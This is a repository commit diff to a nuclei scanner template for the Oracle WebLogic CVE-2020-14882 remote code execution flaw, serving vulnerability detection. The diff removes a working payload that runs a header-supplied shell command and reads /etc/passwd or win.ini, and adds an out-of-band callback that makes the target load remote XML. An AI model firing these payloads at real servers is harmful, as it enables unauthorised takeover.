daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Fixed CVE-2020-14882 payload + matcher

patch-1
sandeep 2021-11-29 01:15:05 +05:30
parent 0f5d673186
commit 682db62431
1 changed files with 10 additions and 16 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

26
cves/2020/CVE-2020-14882.yaml
View File

@ -17,7 +17,7 @@ info:
Easily exploitable vulnerability allows unauthenticated Easily exploitable vulnerability allows unauthenticated
attacker with network access via HTTP to compromise the server. attacker with network access via HTTP to compromise the server.
Successful attacks of this vulnerability can result in takeover. Successful attacks of this vulnerability can result in takeover.
tags: cve,cve2020,oracle,rce,weblogic tags: cve,cve2020,oracle,rce,weblogic,oast
classification: classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80 cvss-score: 9.80
@ -28,25 +28,19 @@ requests:
- | - |
POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1 POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
cmd: {{exec}}
Content-Type: application/x-www-form-urlencoded; charset=utf-8 Content-Type: application/x-www-form-urlencoded; charset=utf-8
_nfpb=false&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession%28%22var%20m%20%3D%20java.lang.Class.forName%28%22weblogic.work.ExecuteThread%22%29.getDeclaredMethod%28%22getCurrentWork%22%29%3B%20var%20currThread%20%3D%20java.lang.Thread.currentThread%28%29%3B%20var%20currWork%20%3D%20m.invoke%28currThread%29%3B%20var%20f2%20%3D%20currWork.getClass%28%29.getDeclaredField%28%22connectionHandler%22%29%3B%20f2.setAccessible%28true%29%3B%20var%20connectionHandler%20%3D%20f2.get%28currWork%29%3B%20var%20f3%20%3D%20connectionHandler.getClass%28%29.getDeclaredField%28%22request%22%29%3B%20f3.setAccessible%28true%29%3B%20var%20request%20%3D%20f3.get%28connectionHandler%29%3B%20var%20command%20%3D%20request.getHeader%28%22cmd%22%29%3B%20var%20response%20%3D%20request.getResponse%28%29%3B%20var%20isWin%20%3D%20java.lang.System.getProperty%28%22os.name%22%29.toLowerCase%28%29.contains%28%22win%22%29%3B%20var%20listCmd%20%3D%20new%20java.util.ArrayList%28%29%3B%20var%20p%20%3D%20new%20java.lang.ProcessBuilder%28%22%22%29%3B%20if%28isWin%29%7Bp.command%28%22cmd.exe%22%2C%20%22%2Fc%22%2C%20command%29%3B%20%7Delse%7Bp.command%28%22%2Fbin%2Fbash%22%2C%20%22-c%22%2C%20command%29%3B%20%7D%20p.redirectErrorStream%28true%29%3B%20var%20process%20%3D%20p.start%28%29%3B%20var%20output%20%3D%20process.getInputStream%28%29%3B%20var%20scanner%20%3D%20new%20java.util.Scanner%28output%29.useDelimiter%28%22%5C%5C%5C%5CA%22%29%3B%20var%20out%20%3D%20scanner.next%28%29%3B%20var%20outputStream%20%3D%20response.getServletOutputStream%28%29%3B%20outputStream.write%28out.getBytes%28%29%29%3B%20outputStream.flush%28%29%3B%20response.getWriter%28%29.write%28%22%22%29%3B%20currThread.interrupt%28%29%3B%22%29 _nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://{{interactsh-url}}")
payloads:
exec:
- "type C:\\Windows\\win.ini" # Windows
- "cat /etc/passwd" # *nix
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: regex - type: word
condition: or part: header
regex: words:
- "root:.*:0:0:" - "ADMINCONSOLESESSION"
- "\\[(font|extension|file)s\\]"
- type: status - type: word
status: part: interactsh_protocol
- 200 words:
- "http"